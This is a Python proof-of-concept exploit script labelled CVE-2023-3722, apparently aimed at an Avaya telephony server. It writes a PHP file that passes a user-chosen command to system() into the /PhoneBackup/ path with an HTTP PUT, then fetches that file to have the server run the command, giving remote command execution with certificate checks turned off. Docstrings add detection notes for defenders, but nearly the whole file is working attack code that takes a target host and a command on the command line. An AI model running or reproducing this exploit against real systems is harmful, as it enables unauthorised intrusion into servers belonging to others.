POC / CVE-2023-3722.py PY
#!/usr/bin/env python3

import requests
import argparse
import random
import string
import urllib3

# Silence urllib3's InsecureRequestWarning. Every request in this script is
# sent with verify=False, so the server certificate is never validated; this
# call only hides the warning that would otherwise report that.
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

def generate_random_filename():
    """Return a file name stem made of eight random decimal digits.

    The caller appends ``.php``, so every file this script uploads matches
    the pattern ``[0-9]{8}.php``.
    """
    digits = random.choices(string.digits, k=8)
    return "".join(digits)

def send_put_request(hostname, query_command):
    """Upload a small PHP file to the target's /PhoneBackup/ path via HTTP PUT.

    First stage of this CVE-2023-3722 proof of concept. The request body is
    a PHP snippet that passes ``query_command`` to ``system()``; the file
    name is eight random digits with a ``.php`` suffix.

    Detection notes, all taken from the request built here: a PUT to
    ``/PhoneBackup/<8 digits>.php`` answered with status 201, sent with the
    fixed ``User-Agent: AVAYA`` header, is the trace to look for in
    web-server access logs. A new ``.php`` file appearing under the
    PhoneBackup directory is the matching on-disk artifact.

    Args:
        hostname: Host (optionally ``host:port``) placed in the HTTPS URL.
        query_command: Text interpolated into the uploaded PHP snippet.

    Returns:
        The generated file name stem (no extension). It is returned whether
        or not the server answered 201.
    """
    stem = generate_random_filename()
    target = f"https://{hostname}/PhoneBackup/{stem}.php"
    body = f"<?php\nsystem('{query_command}');\n"
    request_headers = {
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "AVAYA",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "close"
    }

    # verify=False: the server certificate is not validated.
    reply = requests.put(target, headers=request_headers, data=body, verify=False)
    status = reply.status_code
    print(f"PUT request to {target} completed with status code {status}.")

    # Only 201 (Created) is treated as a successful upload.
    outcome = (
        "PHP script uploaded successfully."
        if status == 201
        else "Failed to upload PHP script."
    )
    print(outcome)

    return stem

def send_get_request(hostname, filename):
    """Request the uploaded file so the server runs it, and print the result.

    Second stage of this proof of concept: a GET for
    ``/PhoneBackup/<filename>.php``. A 200 response body is printed as the
    script's output; any other status is reported as a failure.

    Detection notes, taken from the request built here: the GET targets the
    same ``/PhoneBackup/<8 digits>.php`` path as the preceding PUT and
    carries ``User-Agent: AVAYA`` together with browser-style ``Accept`` and
    ``Priority`` headers. A PUT followed by a GET for the same path is the
    pair to correlate in access logs.

    Args:
        hostname: Host (optionally ``host:port``) placed in the HTTPS URL.
        filename: File name stem returned by the upload step.
    """
    target = f"https://{hostname}/PhoneBackup/{filename}.php"
    request_headers = {
        "Accept-Language": "en-US",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "AVAYA",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Encoding": "gzip, deflate, br",
        "Priority": "u=0, i",
        "Connection": "close"
    }

    # verify=False: the server certificate is not validated.
    reply = requests.get(target, headers=request_headers, verify=False)
    status = reply.status_code
    print(f"GET request to {target} completed with status code {status}.")

    if status != 200:
        print("Failed to execute PHP script.")
        return

    print("Response from PHP script:")
    print(reply.text)

def main():
    """Parse the command line and run the two request stages in order.

    Takes a positional ``hostname`` and an optional ``--query`` (default
    ``id``). The upload (PUT) runs first; the fetch (GET) then runs with the
    returned file name, even when the upload did not report success.
    """
    cli = argparse.ArgumentParser(description="HTTP Request Script with Random Filename")
    cli.add_argument("hostname", help="Target hostname (e.g., example.com:444)")
    cli.add_argument("--query", default="id", help="Command to run in the PHP script (default: id)")
    opts = cli.parse_args()

    # Stage 1: PUT the PHP file; the helper returns the generated name.
    uploaded_name = send_put_request(opts.hostname, opts.query)

    # Stage 2: GET the same path so the server executes the file.
    send_get_request(opts.hostname, uploaded_name)


if __name__ == "__main__":
    main()